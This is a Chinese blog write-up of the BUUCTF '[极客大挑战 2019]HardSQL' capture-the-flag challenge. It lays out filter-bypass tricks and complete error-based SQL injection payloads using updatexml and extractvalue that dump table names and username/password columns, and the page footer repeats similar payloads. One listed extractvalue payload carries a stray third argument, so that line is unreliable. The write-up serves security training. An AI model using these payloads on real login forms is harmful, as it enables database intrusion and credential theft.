BUUCTF之[极客大挑战 2019]HardSQL ----报错注入extractvalue和updatexml

最新推荐文章于 2024-07-30 17:12:16 发布
最新推荐文章于 2024-07-30 17:12:16 发布
阅读量580 收藏 7
点赞数 3
分类专栏: 注入 CTF-WEB 文章标签: mysql web 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44632787/article/details/119120955
版权

BUUCTF之[极客大挑战 2019]HardSQL ----报错注入extractvalue和updatexml

题目
在这里插入图片描述
经过手工测试可以发现过滤:and,/**/,空格,等于号(=),大于号(>)和联合查询union等多个关键词

一般来说,SQL注入有这4个步骤:

  1. 爆数据库:select database()
  2. 爆数据表:select group_concat(table_name) from information_schema.tables where table_schema=database()
  3. 爆数据列:select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘表名’
  4. 获取具体列信息:select group_concat(【查询到的列名】) from 【表名】

对照上面的4个步骤,用下面的几个对应的方法绕过:

  • 空格和/**/都被过滤,所以这里可以用括号()代替空格。
  • 等于号(=)被过滤,这里用模糊查询的like代替
  • 关键词and被过滤,这里需要把第三步的table_schema=database()给删去

所以SQL注入的4个基本步骤变成:

  1. 爆数据库:select(database())
  2. 爆数据表:select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())
  3. 爆数据列:select(group_concat(column_name))from(information_schema.columns)where(table_name)like(‘H4rDsq1’)
  4. 获取具体列信息:select(group_concat(username,"–",password))from(H4rDsq1)

然后再加上报错注入的基本模板:updatexml("~",concat("~",(【这里放查询语句】)),"~")
所以对应的4个payload为:

  1. 爆数据库:?username=1'or(updatexml("~",concat("~",(select(database()))),"~"))%23&password=123
  2. 爆数据表:?username=1'or(updatexml("~",concat("~",(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),"~"))%23&password=123
  3. 爆数据列:?username=1'or(updatexml("~",concat("~",(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),"~"))%23&password=123
  4. 获取具体列信息:?username=1'or(updatexml("~",concat("~",(select(group_concat(username,"--",password))from(H4rDsq1))),"~"))%23&password=123

爆数据库:?username=1'or(updatexml("~",concat("~",(select(database()))),"~"))%23&password=123
在这里插入图片描述
爆数据表:?username=1'or(updatexml("~",concat("~",(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))),"~"))%23&password=123
在这里插入图片描述

爆数据列:?username=1'or(updatexml("~",concat("~",(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),"~"))%23&password=123
在这里插入图片描述

获取具体列信息:?username=1'or(updatexml("~",concat("~",(select(group_concat(username,"--",password))from(H4rDsq1))),"~"))%23&password=123
在这里插入图片描述
可以看到这里获取到了flag,但是获取到的flag是不完全的。这可能是因为后台用到了substr函数截取掉了一部分的flag信息。所以这里可以用left和right函数分别获取左右部分的flag!
如获取左边:?username=1'or(updatexml("~",concat("~",(select(group_concat(left(password,25)))from(H4rDsq1))),"~"))%23&password=123
在这里插入图片描述
获取右边:?username=1'or(updatexml("~",concat("~",(select(group_concat(right(password,25)))from(H4rDsq1))),"~"))%23&password=123
在这里插入图片描述
最后再把左右重叠的flag部分删去就可以了

另外,还有一种报错注入是用extractvalue这个函数。注意updatexml需要三个参数,而extractvalue只需要两个参数。所以:

  • updatexml 改成 extractvalue
  • 把updatexml的第三个参数 “~” 删去

所以extractvalue报错注入对应的4个payload为:

  1. 爆数据库:?username=1'or(extractvalue("~",concat("~",(select(database())))))%23&password=123
  2. 爆数据表:?username=1'or(extractvalue("~",concat("~",(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())))))%23&password=123
  3. 爆数据列:?username=1'or(extractvalue("~",concat("~",(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))),"~"))%23&password=123
  4. 获取具体列信息:?username=1'or(extractvalue("~",concat("~",(select(group_concat(username,"--",password))from(H4rDsq1)))))%23&password=123

爆数据库:?username=1'or(extractvalue("~",concat("~",(select(database())))))%23&password=123
在这里插入图片描述

爆数据表:?username=1'or(extractvalue("~",concat("~",(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())))))%23&password=123
在这里插入图片描述

爆数据列:?username=1'or(extractvalue("~",concat("~",(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')))))%23&password=123
在这里插入图片描述

获取具体列信息:?username=1'or(extractvalue("~",concat("~",(select(group_concat(username,"--",password))from(H4rDsq1)))))%23&password=123
在这里插入图片描述

若丶时光破灭
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF——[极客挑战 2019]HardSQL
doraemon12345的博客
06-01 242
打开题目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做题,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。 先爆库名: payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23 得到库名爆表名: payload:?username=1&password=12
[BUUCTF][极客挑战 2019]Http
朋克归零膏的博客
10-13 708
在CTF中修改http头的操作常有BUUCFT另一题,常用到的值User-AgentReferer。
极客挑战2019-hardsql
最新发布
lht2004的博客
07-30 437
报表名 1'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#报数据 1'or(updatexml(1,concat(0x7e,(select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#
BUUCTFHardSQL[极客挑战 2019]
金 帛的博客
06-06 1381
buucft记录贴
buuctf-[极客挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 3057
buuctf-[极客挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalueupdatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
buu-web [极客挑战 2019]HardSQL报错注入
weixin_53146913的博客
04-10 317
普通的方式注入都被ban了。那使用报错注入试一下吧。 但其过滤了空格和=号,不过我们可以使用()代替空格,like代替=号,用’^'来连接函数,形成异或。 使用updatexml报错法注入 ()-> ' ' 使用()代替空格 ‘ ^ ’ -> 连接函数 用’^'来连接函数 %23 是 '#' 的URL编码。 0x7e 是 '~' 的ascII码。 一、爆库名: admin 1'^extractvalue...
[极客挑战 2019]HardSQL -wp
freerats的博客
07-04 678
直接找注入,随便填写用户名密码,用户名处多加个引号,有报错 加个or 1 # 有过滤,抓个包fuzz一下 等号,空格等被过滤 发现可以用报错注入,空格可以用括号代替 username=admin'or(extractvalue(1,concat('0x7e',version())))%23 username=admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(table
buuctf [极客挑战 2019]FinalSQL
zoixsoadji的博客
03-30 737
进入题目,又是这个作者,试试万能密码 经过实验,双写什么的都没用。 作者说的神秘代码,点进去发现url变了 发现并没有什么卵用…… 正当我没有头绪的时候,我突然看到一句话,审题真的很重要: 盲注!这里附上大佬的脚本: import requests import time url = "http://def9937b-1746-4f41-98c7-a2b55b95664a.node4.buuoj.cn:81/search.php" temp = {"id" : ...
[BUUCTF][极客挑战 2019]PHP
朋克归零膏的博客
10-17 413
反序列化漏洞。
BUUCTF——[极客挑战 2019]PHP
doraemon12345的博客
06-07 317
打开题目,页面上显示说习惯备份,尝试下载备份www.zip,下载后打开查看 flag文件里并不是flag,查看其他的在class文件中发现代码,应该是让我们反序列化,给出源代码 <?php include 'flag.php'; error_reporting(0); class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct(
BUUCTF WEB [极客挑战 2019]HardSQL
Y1da的博客
04-17 591
BUUCTF WEB [极客挑战 2019]HardSQL 万能密码、union联合注入等关键词and、union等均被过滤,尝试报错注入 爆破库名 1'or(extractvalue(1,concat(1,database())))# XPATH syntax error: 'geek' 爆破表名 1'or(extractvalue(1,concat(1,(select(table_name)from(information_schema.tables)where(table_schema
BUUCTF:[极客挑战 2019]HardSQL
末初的CSDN博客
11-07 606
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]HardSQL 使用Burpfuzz测试过滤了哪些关键字 过滤了空格、=、substring、mid等字符 Trick 使用()代替空格 使用like代替= 使用right、left代替substring、mid 注入过程如下 1'or(1)like(2)%23 1'or(updatexml('~',concat('~',
BUUCTF----[极客挑战 2019]HardSQL
woshicainiao666的博客
03-09 559
报错注入updatexml()
BUUCTF [极客挑战 2019]HardSQL
CrotZZ的博客
07-08 224
尝试万能密码被逮住 1’ or 1=1# 经过一系列尝试 order by,union select之类的都被过滤 网上别人的write参考了一下,这里是报错注入,用到xpath语法错误中extractvalue ^表异或,这里or and都被过滤了包括替换成&& ||我也试过也不行。 网上了解了下报错注入,这题目extractvalue里select后要加括号(比如下面database()外面加了括号),而正常情况下是不用的,猜测是空格被过滤的原因。 check.php?username
BUUCTF闯关日记--[极客挑战 2019]HardSQL1
qq_64201116的博客
05-17 507
以后遇到sql注入,我觉得应该先判断他过滤了什么东西,比如比较重要的 第一个:空格 第二个:and,or,select,#,--+ 第三个:'(单引号)和"(双引号) 第四个:注入使用的函数(可以挑你比较喜欢的顺手的或者简单的函数优先): sleep,if(布尔盲注) updatexml,concat(报错注入) order by,union(显错注入) load_file(DNS注入) 当然了还有一些database()等等,把你要走的路先测试一遍再进行渗透 否则你走到最
BUUCTF [web专项25][极客挑战 2019]HardSQL
yanglinchiji的博客
11-05 276
right(password,32) (可以换成30,因为后面还有个}和~,32只是因为没有影响就没改)尝试报错注入(datexmlextractvalue两种,但是我看别人的wp都有,挺全的)那就用^代替and,用()代替空格,like代替等于号(如果还有需要代替的后面再说)发现这次过滤的很全,万能密码没有一个可以使用。经过测试,至少and,空格,等于 等被过滤。我们可以用right函数来获取后面的字符。发现只有一半,因为只能输出32字符。老常客了,进入后先用万能密码试试。拼凑即可获得flag。
[极客挑战 2019]HardSQL
weixin_42513429的博客
04-14 759
[极客挑战 2019]HardSQL报错注入updatexml()报错注入extractvalue()报错注入 报错注入 updatexml()报错注入 打一个单引号,出现报错,再打一个单引号,发现没有报错了,所以考虑是单引号闭合,然后考虑and等关键字,发现拦截,考虑报错注入,空格也过滤了,考虑括号代替,表单提交的数据使用get方法转发到check.php,所以直接通过check.php ge...
buuctf web 极客挑战2019
08-24
嗨!对于BUUCTF Web极客挑战2019,我了解到它是一个网络安全比赛,由北方工业大学举办。这个比赛旨在考察参赛者的网络攻防能力和Web漏洞挖掘技术。比赛的题目涵盖了Web安全的各个方面,包括但不限于漏洞利用、代码审计和网络协议等。参赛者需要通过解决各个题目来获取相应的flag,以证明自己的能力。如果你有具体的问题或需要更详细的信息,我会尽力帮助你。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值